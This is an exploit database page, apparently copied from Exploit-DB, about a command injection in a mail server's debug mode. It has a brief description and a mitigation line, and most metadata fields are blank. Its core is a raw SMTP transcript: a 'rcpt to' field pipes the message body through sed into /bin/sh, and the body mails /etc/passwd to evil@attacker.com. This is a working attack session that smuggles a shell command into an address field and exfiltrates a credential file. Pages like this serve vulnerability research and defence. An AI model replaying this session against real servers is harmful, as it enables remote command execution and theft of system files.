header-logo
Suggest Exploit
vendor:
N/A
by:
N/A
8.8
CVSS
HIGH
Command Injection
78
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
N/A

sed in the receipient strips all mail headers from the message before passing it on to the shell

This exploit is a type of command injection attack which allows an attacker to execute arbitrary commands on the vulnerable system. The attacker sends a maliciously crafted email to the victim's mail server, which contains a command in the recipient field. The command is then executed on the server, allowing the attacker to gain access to the system.

Mitigation:

Input validation should be used to detect and reject maliciously crafted input. Additionally, the application should be configured to use the least privileged account with access to the system.
Source

Exploit-DB raw data:

220 mail.victim.com SMTP
helo attacker.com
250 Hello attacker.com, pleased to meet you.
debug
200 OK
mail from: </dev/null>
250 OK
rcpt to:<|sed -e '1,/^$/'d | /bin/sh ; exit 0">
250 OK
data
354 Start mail input; end with <CRLF>.<CRLF>
mail evil@attacker.com </etc/passwd
.
250 OK
quit
221 mail.victim.com Terminating

The sed in the receipient strips all mail headers from the
message before passing it on to the shell.

Navigation

Suggest Exploit

Services By CQR